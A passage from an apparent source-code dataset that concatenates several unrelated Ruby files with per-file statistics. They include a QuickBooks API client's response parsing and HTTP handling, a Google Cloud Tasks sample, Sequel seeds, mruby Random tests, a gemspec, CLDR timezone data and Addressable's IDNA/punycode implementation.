  collection = parse_collection(response, model)
  if collection.is_a?(Quickbooks::Collection)
    collection.entries.first
  else
    nil
  end
end

# Runs +query+ with :page/:per_page paging options and returns a
# Quickbooks::Collection of +model+ instances.
def fetch_collection(query, model, options = {})
  page = options.fetch(:page, 1)
  per_page = options.fetch(:per_page, 20)

  start_position = ((page - 1) * per_page) + 1 # page=2, per_page=10 then we want to start at 11
  max_results = per_page

  response = do_http_get(url_for_query(query, start_position, max_results))
  parse_collection(response, model)
end
# Builds a Quickbooks::Collection from the last parsed response body.
# Reads paging attributes (startPosition/maxResults/totalCount) off the
# QueryResponse node, then instantiates one +model+ per matching
# XML_NODE element. Returns nil when +response+ is falsy; wraps any
# parse failure in Quickbooks::IntuitRequestException.
def parse_collection(response, model)
  if response
    collection = Quickbooks::Collection.new
    xml = @last_response_xml
    begin
      results = []

      query_response = xml.xpath("//xmlns:IntuitResponse/xmlns:QueryResponse")[0]
      if query_response

        start_pos_attr = query_response.attributes['startPosition']
        if start_pos_attr
          collection.start_position = start_pos_attr.value.to_i
        end

        max_results_attr = query_response.attributes['maxResults']
        if max_results_attr
          collection.max_results = max_results_attr.value.to_i
        end

        total_count_attr = query_response.attributes['totalCount']
        if total_count_attr
          collection.total_count = total_count_attr.value.to_i
        end
      end

      path_to_nodes = "//xmlns:IntuitResponse//xmlns:#{model::XML_NODE}"
      collection.count = xml.xpath(path_to_nodes).count
      if collection.count > 0
        xml.xpath(path_to_nodes).each do |xa|
          entry = model.from_xml(xa)
          # Reports responses additionally carry the currency and the raw body.
          addition = xml.xpath(path_to_nodes)[0].xpath("//xmlns:Currency").children.to_s if "#{model::XML_NODE}" == "Reports"
          entry.currency = addition if "#{model::XML_NODE}" == "Reports"
          collection.body = response.body if "#{model::XML_NODE}" == "Reports"
          results << entry
        end
      end
      collection.entries = results
    rescue => ex
      raise Quickbooks::IntuitRequestException.new("Error parsing XML: #{ex.message}")
    end
    collection
  else
    nil
  end
end
# Given an IntuitResponse which is expected to wrap a single
# Entity node, e.g.
# <IntuitResponse xmlns="http://schema.intuit.com/finance/v3" time="2013-11-16T10:26:42.762-08:00">
#   <Customer domain="QBO" sparse="false">
#     <Id>1</Id>
#     ...
#   </Customer>
# </IntuitResponse>
#
# Returns the bare entity node (the model's XML_NODE unless an explicit
# xpath prefix is supplied).
def parse_singular_entity_response(model, xml, node_xpath_prefix = nil)
  xmldoc = Nokogiri(xml)
  prefix = node_xpath_prefix || model::XML_NODE
  xmldoc.xpath("//xmlns:IntuitResponse/xmlns:#{prefix}")[0]
end

# A successful delete request returns a XML packet like:
# <IntuitResponse xmlns="http://schema.intuit.com/finance/v3" time="2013-04-23T08:30:33.626-07:00">
#   <Payment domain="QBO" status="Deleted">
#     <Id>8748</Id>
#   </Payment>
# </IntuitResponse>
#
# True when exactly one entity node is marked status="Deleted".
def parse_singular_entity_response_for_delete(model, xml)
  xmldoc = Nokogiri(xml)
  xmldoc.xpath("//xmlns:IntuitResponse/xmlns:#{model::XML_NODE}[@status='Deleted']").length == 1
end
# Issues a POST of +body+ to +url+ (params appended as a query string).
def do_http_post(url, body = "", params = {}, headers = {}) # throws IntuitRequestException
  url = add_query_string_to_url(url, params)
  do_http(:post, url, body, headers)
end

# Issues a GET of +url+ (params appended as a query string).
def do_http_get(url, params = {}, headers = {}) # throws IntuitRequestException
  url = add_query_string_to_url(url, params)
  do_http(:get, url, {}, headers)
end

# Uploads a file as multipart/form-data, optionally attaching an XML
# metadata part describing the attachment.
def do_http_file_upload(uploadIO, url, metadata = nil)
  headers = {
    'Content-Type' => 'multipart/form-data'
  }
  body = {}
  body['file_content_0'] = uploadIO

  if metadata
    standalone_prefix = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    meta_data_xml = "#{standalone_prefix}\n#{metadata.to_xml_ns.to_s}"
    param_part = UploadIO.new(StringIO.new(meta_data_xml), "application/xml")
    body['file_metadata_0'] = param_part
  end

  do_http(:upload, url, body, headers)
end
# Central HTTP dispatcher for :get, :post and :upload. Fills in the
# default headers, logs the request, performs it via the OAuth client
# and runs the result through check_response (which raises on errors).
def do_http(method, url, body, headers) # throws IntuitRequestException
  if @oauth.nil?
    raise "OAuth client has not been initialized. Initialize with setter access_token="
  end
  unless headers.has_key?('Content-Type')
    headers['Content-Type'] = HTTP_CONTENT_TYPE
  end
  unless headers.has_key?('Accept')
    headers['Accept'] = HTTP_ACCEPT
  end
  unless headers.has_key?('Accept-Encoding')
    headers['Accept-Encoding'] = HTTP_ACCEPT_ENCODING
  end

  log "------ QUICKBOOKS-RUBY REQUEST ------"
  log "METHOD = #{method}"
  log "RESOURCE = #{url}"
  log "REQUEST BODY:"
  log(log_xml(body))
  log "REQUEST HEADERS = #{headers.inspect}"

  response = case method
    when :get
      @oauth.get(url, headers)
    when :post
      @oauth.post(url, body, headers)
    when :upload
      @oauth.post_with_multipart(url, body, headers)
    else
      raise "Do not know how to perform that HTTP operation"
    end
  check_response(response, :request_xml => body)
end
# Appends the given params Hash to +url+ as a query string; returns the
# url untouched when params is not a non-empty Hash. Values are not
# URL-encoded (callers pass pre-encoded values).
def add_query_string_to_url(url, params)
  return url unless params.is_a?(Hash) && !params.empty?

  query = params.map { |key, value| "#{key}=#{value}" }.join("&")
  "#{url}?#{query}"
end
# Logs and parses the HTTP response, then maps status codes to
# behavior: 200 may still carry an embedded Fault and is re-checked;
# 401/403/503/504 raise dedicated exception classes; 400/500 raise an
# IntuitRequestException built from the Fault payload.
def check_response(response, options = {})
  log "------ QUICKBOOKS-RUBY RESPONSE ------"
  log "RESPONSE CODE = #{response.code}"
  log "RESPONSE BODY:"
  log(log_xml(response.plain_body))
  parse_xml(response.plain_body)
  status = response.code.to_i
  case status
  when 200
    # even HTTP 200 can contain an error, so we always have to peek for an Error
    if response_is_error?
      parse_and_raise_exception(options)
    else
      response
    end
  when 302
    raise "Unhandled HTTP Redirect"
  when 401
    raise Quickbooks::AuthorizationFailure
  when 403
    raise Quickbooks::Forbidden
  when 400, 500
    parse_and_raise_exception(options)
  when 503, 504
    raise Quickbooks::ServiceUnavailable
  else
    raise "HTTP Error Code: #{status}, Msg: #{response.plain_body}"
  end
end
# Converts the Fault in the last response into a raised
# Quickbooks::IntuitRequestException carrying code/detail/type and the
# request XML that was sent.
def parse_and_raise_exception(options = {})
  err = parse_intuit_error
  ex = Quickbooks::IntuitRequestException.new("#{err[:message]}:\n\t#{err[:detail]}")
  ex.code = err[:code]
  ex.detail = err[:detail]
  ex.type = err[:type]
  ex.request_xml = options[:request_xml]
  raise ex
end

# True when the last response body contains an IntuitResponse/Fault
# node; a document the XPath engine rejects is also treated as an error.
def response_is_error?
  @last_response_xml.xpath("//xmlns:IntuitResponse/xmlns:Fault")[0] != nil
rescue Nokogiri::XML::XPath::SyntaxError => exception
  true
end
# Extracts the Fault information from the last parsed response into a
# Hash with :message, :detail, :type, :code and (when present)
# :element. Falls back to the raw XML in :detail when the document
# cannot be traversed.
def parse_intuit_error
  error = {:message => "", :detail => "", :type => nil, :code => 0}
  fault = @last_response_xml.xpath("//xmlns:IntuitResponse/xmlns:Fault")[0]
  if fault
    error[:type] = fault.attributes['type'].value

    error_element = fault.xpath("//xmlns:Error")[0]
    if error_element
      code_attr = error_element.attributes['code']
      if code_attr
        error[:code] = code_attr.value
      end

      # Bug fix: this branch previously re-tested and copied code_attr,
      # so the Error node's 'element' attribute was never captured.
      element_attr = error_element.attributes['element']
      if element_attr
        error[:element] = element_attr.value
      end
      error[:message] = error_element.xpath("//xmlns:Message").text
      error[:detail] = error_element.xpath("//xmlns:Detail").text
    end
  end

  error
rescue Nokogiri::XML::XPath::SyntaxError => exception
  error[:detail] = @last_response_xml.to_s
  error
end
end
end
end
| 33.591054 | 131 | 0.592258 |
e964d15d31357d903d510f225bfada82aeeb34f0 | 1,240 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# [START cloudtasks_v2beta3_generated_CloudTasks_DeleteQueue_sync]
require "google/cloud/tasks/v2beta3"
# Create a client object. The client can be reused for multiple calls.
client = Google::Cloud::Tasks::V2beta3::CloudTasks::Client.new
# Create a request. To set request fields, pass in keyword arguments.
request = Google::Cloud::Tasks::V2beta3::DeleteQueueRequest.new
# Call the delete_queue method.
result = client.delete_queue request
# The returned object is of type Google::Protobuf::Empty.
p result
# [END cloudtasks_v2beta3_generated_CloudTasks_DeleteQueue_sync]
| 36.470588 | 74 | 0.783065 |
bfb9b10e8cbc64e215ed32e73c622dc7417c32ed | 532 | # frozen_string_literal: true
# Applies only to the "development" and "test" environments.
Sequel.seed(:development, :test) do
  def run
    # Sample user for local development / test logins.
    User.create \
      full_name: "Richard Feynman",
      profession: "Theoretical physicist",
      username: "rfeynman",
      password: "271828"
  end
end

# Wildcard Seed; applies to every environment
Sequel.seed do
  def run
    # Reference currency data required everywhere.
    [
      ["USD", "United States dollar"],
      ["BRL", "Brazilian real"]
    ].each do |abbr, name|
      Currency.create abbr: abbr, name: name
    end
  end
end
| 23.130435 | 91 | 0.648496 |
01d231d5ce339d9a650edec45e77ae1a7ff2fdeb | 412 | ##
# Random Test
# Two generators created with the same seed must produce the same
# first value.
assert("Random#srand") do
  r1 = Random.new(123)
  r2 = Random.new(123)
  r1.rand == r2.rand
end

# Re-seeding the global generator replays the same sequence.
assert("Kernel::srand") do
  srand(234)
  r1 = rand
  srand(234)
  r2 = rand
  r1 == r2
end

# Random.srand and Kernel#srand share the default generator's state.
assert("Random::srand") do
  Random.srand(345)
  r1 = rand
  srand(345)
  r2 = Random.rand
  r1 == r2
end

# rand(limit) returns an integer; bare rand returns a float.
assert("fixnum") do
  rand(3).class == Fixnum
end

assert("float") do
  rand.class == Float
end
| 12.484848 | 26 | 0.618932 |
5dbe002e8c77f7fbd18f89808270db396bf18005 | 1,628 | # frozen_string_literal: true
$LOAD_PATH.push File.expand_path("../lib", __FILE__)
require "magic_lamp/version"
Gem::Specification.new do |s|
  s.name = "magic_lamp"
  s.version = MagicLamp::VERSION
  s.authors = ["Michael Crismali"]
  s.email = ["[email protected]"]
  s.homepage = "https://github.com/crismali/magic_lamp"

  # Fix: summary previously read "break when if your templates change".
  s.summary = "Makes sure your JavaScript tests break when your templates change."
  s.description = "MagicLamp provides an easy way to get your Rails templates into your JavaScript specs."
  s.license = "Apache 2.0"

  s.files = Dir["{app,config,lib}/**/*", "VERSION", "LICENSE", "README.md"]
  # Package the spec suite, excluding local artifacts (databases, logs,
  # caches, temp files and the dummy app's dotfiles).
  s.test_files = Dir["spec/**/*"].reject do |file_path|
    [
      /\.sqlite3\z/,
      /\.sqlite3-journal\z/,
      /\.log\z/,
      /tmp/,
      /\.sass-cache\z/,
      %r{spec/dummy/\.}
    ].any? do |ignored_pattern|
      file_path.match(ignored_pattern)
    end
  end

  s.add_dependency "rails", ">= 4.0.0"
  s.add_dependency "rake"
  s.add_dependency "method_source"

  s.add_development_dependency "appraisal"
  s.add_development_dependency "bundler", "~> 1.7"
  s.add_development_dependency "database_cleaner"
  s.add_development_dependency "dotenv-rails"
  s.add_development_dependency "fantaskspec"
  s.add_development_dependency "pry"
  s.add_development_dependency "pry-doc"
  s.add_development_dependency "pry-nav"
  s.add_development_dependency "rspec-rails"
  s.add_development_dependency "rubocop", "~> 0.48.1"
  s.add_development_dependency "selenium-webdriver"
  s.add_development_dependency "sqlite3"
  s.add_development_dependency "teaspoon"
end
| 33.22449 | 106 | 0.69656 |
e286c9722c99938c7f0cc1051ada35677e3b9d2d | 2,181 | #
# a language data file for Ruby/CLDR
#
# Generated by: CLDR::Generator
#
# CLDR version: 1.3
#
# Original file name: common/main/sr_Latn_YU.xml
# Original file revision: 1.11 $
#
# Copyright (C) 2006 Masao Mutoh
#
# This file is distributed under the same license as the Ruby/CLDR.
#
private
def init_data
@hourformat = "+HHmm;-HHmm"
@hoursformat = "{0}/{1}"
@regionformat = "{0}"
@fallbackformat = "{0} ({1})"
@abbreviationfallback = "standard"
@preferenceordering = ""
@singlecountries = "Africa/Bamako America/Godthab America/Santiago America/Guayaquil Asia/Shanghai Asia/Tashkent Asia/Kuala_Lumpur Europe/Madrid Europe/Lisbon Europe/London Pacific/Auckland Pacific/Tahiti"
@exemplarcities = {}
@exemplarcities["Africa/Kinshasa"] = "Kinšasa"
@exemplarcities["Africa/Lubumbashi"] = "Лумумбаши"
@exemplarcities["Antarctica/South_Pole"] = "Južni pol"
@exemplarcities["Asia/Anadyr"] = "Anadir"
@exemplarcities["Asia/Kamchatka"] = "Kamčatka"
@exemplarcities["Asia/Krasnoyarsk"] = "Krasnojarsk"
@exemplarcities["Asia/Shanghai"] = "Šangaj"
@exemplarcities["Asia/Tashkent"] = "Taškent"
@exemplarcities["Europe/Kiev"] = "Kijev"
@exemplarcities["Europe/Moscow"] = "Moskva"
@exemplarcities["Europe/Uzhgorod"] = "Užgorod"
@exemplarcities["Europe/Zaporozhye"] = "Zaporožje"
@long_generics = {}
@long_standards = {}
@long_standards["Europe/Belgrade"] = "Centralno Evropsko Vreme"
@long_daylights = {}
@long_daylights["Europe/Belgrade"] = "Centralno Evropsko Vreme"
@short_generics = {}
@short_standards = {}
@short_standards["Europe/Belgrade"] = "CET"
@short_daylights = {}
@short_daylights["Europe/Belgrade"] = "CET"
end
public
attr_reader :hourformat
attr_reader :hoursformat
attr_reader :regionformat
attr_reader :fallbackformat
attr_reader :abbreviationfallback
attr_reader :preferenceordering
attr_reader :singlecountries
attr_reader :exemplarcities
attr_reader :long_generics
attr_reader :long_standards
attr_reader :long_daylights
attr_reader :short_generics
attr_reader :short_standards
attr_reader :short_daylights
| 33.553846 | 217 | 0.711142 |
7a32a071437798e767b215d4f79bda1c0e8cd985 | 21,359 | # encoding:utf-8
#--
# Copyright (C) Bob Aman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#++
module Addressable
module IDNA
# This module is loosely based on idn_actionmailer by Mick Staugaard,
# the unicode library by Yoshida Masato, and the punycode implementation
# by Kazuhiro Nishiyama. Most of the code was copied verbatim, but
# some reformatting was done, and some translation from C was done.
#
# Without their code to work from as a base, we'd all still be relying
# on the presence of libidn. Which nobody ever seems to have installed.
#
# Original sources:
# http://github.com/staugaard/idn_actionmailer
# http://www.yoshidam.net/Ruby.html#unicode
# http://rubyforge.org/frs/?group_id=2550
UNICODE_TABLE = File.expand_path(
File.join(File.dirname(__FILE__), '../../..', 'data/unicode.data')
)
ACE_PREFIX = "xn--"
UTF8_REGEX = /\A(?:
[\x09\x0A\x0D\x20-\x7E] # ASCII
| [\xC2-\xDF][\x80-\xBF] # non-overlong 2-byte
| \xE0[\xA0-\xBF][\x80-\xBF] # excluding overlongs
| [\xE1-\xEC\xEE\xEF][\x80-\xBF]{2} # straight 3-byte
| \xED[\x80-\x9F][\x80-\xBF] # excluding surrogates
| \xF0[\x90-\xBF][\x80-\xBF]{2} # planes 1-3
| [\xF1-\xF3][\x80-\xBF]{3} # planes 4nil5
| \xF4[\x80-\x8F][\x80-\xBF]{2} # plane 16
)*\z/mnx
UTF8_REGEX_MULTIBYTE = /(?:
[\xC2-\xDF][\x80-\xBF] # non-overlong 2-byte
| \xE0[\xA0-\xBF][\x80-\xBF] # excluding overlongs
| [\xE1-\xEC\xEE\xEF][\x80-\xBF]{2} # straight 3-byte
| \xED[\x80-\x9F][\x80-\xBF] # excluding surrogates
| \xF0[\x90-\xBF][\x80-\xBF]{2} # planes 1-3
| [\xF1-\xF3][\x80-\xBF]{3} # planes 4nil5
| \xF4[\x80-\x8F][\x80-\xBF]{2} # plane 16
)/mnx
# :startdoc:
# Converts from a Unicode internationalized domain name to an ASCII
# domain name as described in RFC 3490.
#
# Each dot-separated label containing non-ASCII UTF-8 is downcased,
# NFKC-normalized and punycode-encoded behind the "xn--" ACE prefix;
# pure-ASCII labels pass through unchanged.
def self.to_ascii(input)
  input = input.to_s unless input.is_a?(String)
  input = input.dup
  if input.respond_to?(:force_encoding)
    input.force_encoding(Encoding::ASCII_8BIT)
  end
  if input =~ UTF8_REGEX && input =~ UTF8_REGEX_MULTIBYTE
    parts = unicode_downcase(input).split('.')
    parts.map! do |part|
      if part.respond_to?(:force_encoding)
        part.force_encoding(Encoding::ASCII_8BIT)
      end
      if part =~ UTF8_REGEX && part =~ UTF8_REGEX_MULTIBYTE
        ACE_PREFIX + punycode_encode(unicode_normalize_kc(part))
      else
        part
      end
    end
    parts.join('.')
  else
    input
  end
end
# Converts from an ASCII domain name to a Unicode internationalized
# domain name as described in RFC 3490.
#
# Labels carrying the "xn--" ACE prefix are punycode-decoded; labels
# that fail to decode are passed through unchanged.
def self.to_unicode(input)
  input = input.to_s unless input.is_a?(String)
  parts = input.split('.')
  parts.map! do |part|
    if part =~ /^#{ACE_PREFIX}(.+)/
      begin
        punycode_decode(part[/^#{ACE_PREFIX}(.+)/, 1])
      rescue Addressable::IDNA::PunycodeBadInput
        # toUnicode is explicitly defined as never-fails by the spec
        part
      end
    else
      part
    end
  end
  output = parts.join('.')
  if output.respond_to?(:force_encoding)
    output.force_encoding(Encoding::UTF_8)
  end
  output
end
# Unicode normalization form KC: compatibility decomposition, then
# canonical ordering of combining marks, then canonical composition.
def self.unicode_normalize_kc(input)
  input = input.to_s unless input.is_a?(String)
  unpacked = input.unpack("U*")
  unpacked =
    unicode_compose(unicode_sort_canonical(unicode_decompose(unpacked)))
  return unpacked.pack("U*")
end
##
# Unicode aware downcase method.
#
# @api private
# @param [String] input
#   The input string.
# @return [String] The downcased result.
def self.unicode_downcase(input)
  input = input.to_s unless input.is_a?(String)
  unpacked = input.unpack("U*")
  # Map each code point through the lowercase table and re-pack as UTF-8.
  unpacked.map! { |codepoint| lookup_unicode_lowercase(codepoint) }
  return unpacked.pack("U*")
end
(class <<self; private :unicode_downcase; end)
# Canonically composes a sequence of unpacked code points: each pair is
# combined via unicode_compose_pair whenever the running starter is not
# blocked by a preceding combining character.
#
# Bug fix: both loop branches previously assigned a misspelled local
# ("startercc"), so starter_cc was never updated after initialization;
# the assignments now target starter_cc as intended.
def self.unicode_compose(unpacked)
  unpacked_result = []
  length = unpacked.length
  return unpacked if length == 0
  starter = unpacked[0]
  starter_cc = lookup_unicode_combining_class(starter)
  # A non-zero combining class blocks composition; 256 marks "blocked".
  starter_cc = 256 if starter_cc != 0

  for i in 1...length
    ch = unpacked[i]
    cc = lookup_unicode_combining_class(ch)
    if (starter_cc == 0 &&
        (composite = unicode_compose_pair(starter, ch)) != nil)
      starter = composite
      starter_cc = lookup_unicode_combining_class(composite)
    else
      unpacked_result << starter
      starter = ch
      starter_cc = cc
    end
  end
  unpacked_result << starter
  return unpacked_result
end
(class <<self; private :unicode_compose; end)
# Attempts canonical composition of two code points. Hangul L+V and
# LV+T pairs are composed arithmetically; everything else is looked up
# in the composition table keyed by the UTF-8 bytes of the pair.
# Returns nil when the pair does not compose.
def self.unicode_compose_pair(ch_one, ch_two)
  if ch_one >= HANGUL_LBASE && ch_one < HANGUL_LBASE + HANGUL_LCOUNT &&
      ch_two >= HANGUL_VBASE && ch_two < HANGUL_VBASE + HANGUL_VCOUNT
    # Hangul L + V
    return HANGUL_SBASE + (
      (ch_one - HANGUL_LBASE) * HANGUL_VCOUNT + (ch_two - HANGUL_VBASE)
    ) * HANGUL_TCOUNT
  elsif ch_one >= HANGUL_SBASE &&
      ch_one < HANGUL_SBASE + HANGUL_SCOUNT &&
      (ch_one - HANGUL_SBASE) % HANGUL_TCOUNT == 0 &&
      ch_two >= HANGUL_TBASE && ch_two < HANGUL_TBASE + HANGUL_TCOUNT
    # Hangul LV + T
    return ch_one + (ch_two - HANGUL_TBASE)
  end

  p = []
  # Appends the UTF-8 byte sequence of a UCS-4 code point onto p.
  ucs4_to_utf8 = lambda do |ch|
    if ch < 128
      p << ch
    elsif ch < 2048
      p << (ch >> 6 | 192)
      p << (ch & 63 | 128)
    elsif ch < 0x10000
      p << (ch >> 12 | 224)
      p << (ch >> 6 & 63 | 128)
      p << (ch & 63 | 128)
    elsif ch < 0x200000
      p << (ch >> 18 | 240)
      p << (ch >> 12 & 63 | 128)
      p << (ch >> 6 & 63 | 128)
      p << (ch & 63 | 128)
    elsif ch < 0x4000000
      p << (ch >> 24 | 248)
      p << (ch >> 18 & 63 | 128)
      p << (ch >> 12 & 63 | 128)
      p << (ch >> 6 & 63 | 128)
      p << (ch & 63 | 128)
    elsif ch < 0x80000000
      p << (ch >> 30 | 252)
      p << (ch >> 24 & 63 | 128)
      p << (ch >> 18 & 63 | 128)
      p << (ch >> 12 & 63 | 128)
      p << (ch >> 6 & 63 | 128)
      p << (ch & 63 | 128)
    end
  end

  ucs4_to_utf8.call(ch_one)
  ucs4_to_utf8.call(ch_two)

  return lookup_unicode_composition(p)
end
(class <<self; private :unicode_compose_pair; end)
# Canonical ordering of combining marks: adjacent code points whose
# combining classes are both non-zero and out of order are bubbled
# into place (the standard canonical-ordering algorithm).
def self.unicode_sort_canonical(unpacked)
  unpacked = unpacked.dup
  i = 1
  length = unpacked.length

  return unpacked if length < 2

  while i < length
    last = unpacked[i-1]
    ch = unpacked[i]
    last_cc = lookup_unicode_combining_class(last)
    cc = lookup_unicode_combining_class(ch)
    if cc != 0 && last_cc != 0 && last_cc > cc
      unpacked[i] = last
      unpacked[i-1] = ch
      # Step back so the swapped pair is re-compared with its predecessor.
      i -= 1 if i > 1
    else
      i += 1
    end
  end
  return unpacked
end
(class <<self; private :unicode_sort_canonical; end)
# Recursively decomposes code points: Hangul syllables are split
# arithmetically into L/V/T jamo; everything else is expanded through
# the compatibility-decomposition table.
def self.unicode_decompose(unpacked)
  unpacked_result = []
  for cp in unpacked
    if cp >= HANGUL_SBASE && cp < HANGUL_SBASE + HANGUL_SCOUNT
      l, v, t = unicode_decompose_hangul(cp)
      unpacked_result << l
      unpacked_result << v if v
      unpacked_result << t if t
    else
      dc = lookup_unicode_compatibility(cp)
      unless dc
        unpacked_result << cp
      else
        unpacked_result.concat(unicode_decompose(dc.unpack("U*")))
      end
    end
  end
  return unpacked_result
end
(class <<self; private :unicode_decompose; end)
# Splits a precomposed Hangul syllable into its leading consonant,
# vowel and (optional) trailing consonant jamo. A code point outside
# the syllable block is returned unchanged as [codepoint, nil, nil].
def self.unicode_decompose_hangul(codepoint)
  sindex = codepoint - HANGUL_SBASE
  return codepoint, nil, nil if sindex < 0 || sindex >= HANGUL_SCOUNT

  leading = HANGUL_LBASE + sindex / HANGUL_NCOUNT
  vowel = HANGUL_VBASE + (sindex % HANGUL_NCOUNT) / HANGUL_TCOUNT
  trailing = HANGUL_TBASE + sindex % HANGUL_TCOUNT
  # HANGUL_TBASE itself means "no trailing consonant".
  trailing = nil if trailing == HANGUL_TBASE
  return leading, vowel, trailing
end
(class <<self; private :unicode_decompose_hangul; end)
# Combining class for a code point (0 when absent from the table).
def self.lookup_unicode_combining_class(codepoint)
  codepoint_data = UNICODE_DATA[codepoint]
  (codepoint_data ?
    (codepoint_data[UNICODE_DATA_COMBINING_CLASS] || 0) :
    0)
end
(class <<self; private :lookup_unicode_combining_class; end)

# Compatibility decomposition string, or nil when there is none.
def self.lookup_unicode_compatibility(codepoint)
  codepoint_data = UNICODE_DATA[codepoint]
  (codepoint_data ?
    codepoint_data[UNICODE_DATA_COMPATIBILITY] : nil)
end
(class <<self; private :lookup_unicode_compatibility; end)

# Lowercase mapping, falling back to the code point itself.
def self.lookup_unicode_lowercase(codepoint)
  codepoint_data = UNICODE_DATA[codepoint]
  (codepoint_data ?
    (codepoint_data[UNICODE_DATA_LOWERCASE] || codepoint) :
    codepoint)
end
(class <<self; private :lookup_unicode_lowercase; end)

# Composed code point for a UTF-8 byte-sequence key, or nil.
def self.lookup_unicode_composition(unpacked)
  return COMPOSITION_TABLE[unpacked]
end
(class <<self; private :lookup_unicode_composition; end)
HANGUL_SBASE = 0xac00
HANGUL_LBASE = 0x1100
HANGUL_LCOUNT = 19
HANGUL_VBASE = 0x1161
HANGUL_VCOUNT = 21
HANGUL_TBASE = 0x11a7
HANGUL_TCOUNT = 28
HANGUL_NCOUNT = HANGUL_VCOUNT * HANGUL_TCOUNT # 588
HANGUL_SCOUNT = HANGUL_LCOUNT * HANGUL_NCOUNT # 11172
UNICODE_DATA_COMBINING_CLASS = 0
UNICODE_DATA_EXCLUSION = 1
UNICODE_DATA_CANONICAL = 2
UNICODE_DATA_COMPATIBILITY = 3
UNICODE_DATA_UPPERCASE = 4
UNICODE_DATA_LOWERCASE = 5
UNICODE_DATA_TITLECASE = 6
begin
if defined?(FakeFS)
fakefs_state = FakeFS.activated?
FakeFS.deactivate!
end
# This is a sparse Unicode table. Codepoints without entries are
# assumed to have the value: [0, 0, nil, nil, nil, nil, nil]
UNICODE_DATA = File.open(UNICODE_TABLE, "rb") do |file|
Marshal.load(file.read)
end
ensure
if defined?(FakeFS)
FakeFS.activate! if fakefs_state
end
end
COMPOSITION_TABLE = {}
for codepoint, data in UNICODE_DATA
canonical = data[UNICODE_DATA_CANONICAL]
exclusion = data[UNICODE_DATA_EXCLUSION]
if canonical && exclusion == 0
COMPOSITION_TABLE[canonical.unpack("C*")] = codepoint
end
end
UNICODE_MAX_LENGTH = 256
ACE_MAX_LENGTH = 256
PUNYCODE_BASE = 36
PUNYCODE_TMIN = 1
PUNYCODE_TMAX = 26
PUNYCODE_SKEW = 38
PUNYCODE_DAMP = 700
PUNYCODE_INITIAL_BIAS = 72
PUNYCODE_INITIAL_N = 0x80
PUNYCODE_DELIMITER = 0x2D
PUNYCODE_MAXINT = 1 << 64
PUNYCODE_PRINT_ASCII =
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" +
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" +
" !\"\#$%&'()*+,-./" +
"0123456789:;<=>?" +
"@ABCDEFGHIJKLMNO" +
"PQRSTUVWXYZ[\\]^_" +
"`abcdefghijklmno" +
"pqrstuvwxyz{|}~\n"
# Input is invalid.
class PunycodeBadInput < StandardError; end
# Output would exceed the space provided.
class PunycodeBigOutput < StandardError; end
# Input needs wider integers to process.
class PunycodeOverflow < StandardError; end
# Encodes a UTF-8 string into the punycode form used inside ACE labels
# (RFC 3492). Direct port of the C reference implementation; raises
# PunycodeBigOutput / PunycodeOverflow / PunycodeBadInput on the
# corresponding failure conditions.
def self.punycode_encode(unicode)
  unicode = unicode.to_s unless unicode.is_a?(String)
  input = unicode.unpack("U*")
  output = [0] * (ACE_MAX_LENGTH + 1)
  input_length = input.size
  output_length = [ACE_MAX_LENGTH]

  # Initialize the state
  n = PUNYCODE_INITIAL_N
  delta = out = 0
  max_out = output_length[0]
  bias = PUNYCODE_INITIAL_BIAS

  # Handle the basic code points:
  input_length.times do |j|
    if punycode_basic?(input[j])
      if max_out - out < 2
        raise PunycodeBigOutput,
          "Output would exceed the space provided."
      end
      output[out] = input[j]
      out += 1
    end
  end

  h = b = out

  # h is the number of code points that have been handled, b is the
  # number of basic code points, and out is the number of characters
  # that have been output.

  if b > 0
    output[out] = PUNYCODE_DELIMITER
    out += 1
  end

  # Main encoding loop:

  while h < input_length
    # All non-basic code points < n have been
    # handled already. Find the next larger one:

    m = PUNYCODE_MAXINT
    input_length.times do |j|
      m = input[j] if (n...m) === input[j]
    end

    # Increase delta enough to advance the decoder's
    # <n,i> state to <m,0>, but guard against overflow:

    if m - n > (PUNYCODE_MAXINT - delta) / (h + 1)
      raise PunycodeOverflow, "Input needs wider integers to process."
    end
    delta += (m - n) * (h + 1)
    n = m

    input_length.times do |j|
      # Punycode does not need to check whether input[j] is basic:
      if input[j] < n
        delta += 1
        if delta == 0
          raise PunycodeOverflow,
            "Input needs wider integers to process."
        end
      end

      if input[j] == n
        # Represent delta as a generalized variable-length integer:

        q = delta; k = PUNYCODE_BASE
        while true
          if out >= max_out
            raise PunycodeBigOutput,
              "Output would exceed the space provided."
          end
          # Threshold t clamps k - bias into [TMIN, TMAX].
          t = (
            if k <= bias
              PUNYCODE_TMIN
            elsif k >= bias + PUNYCODE_TMAX
              PUNYCODE_TMAX
            else
              k - bias
            end
          )
          break if q < t
          output[out] =
            punycode_encode_digit(t + (q - t) % (PUNYCODE_BASE - t))
          out += 1
          q = (q - t) / (PUNYCODE_BASE - t)
          k += PUNYCODE_BASE
        end

        output[out] = punycode_encode_digit(q)
        out += 1
        bias = punycode_adapt(delta, h + 1, h == b)
        delta = 0
        h += 1
      end
    end

    delta += 1
    n += 1
  end

  output_length[0] = out

  # Sanity-check that every emitted byte is printable ASCII.
  outlen = out
  outlen.times do |j|
    c = output[j]
    unless c >= 0 && c <= 127
      raise StandardError, "Invalid output char."
    end
    unless PUNYCODE_PRINT_ASCII[c]
      raise PunycodeBadInput, "Input is invalid."
    end
  end

  # Drop the unused NUL tail of the preallocated buffer and stringify.
  output[0..outlen].map { |x| x.chr }.join("").sub(/\0+\z/, "")
end
(class <<self; private :punycode_encode; end)
# Decodes a punycode string (the part after the "xn--" prefix) back to
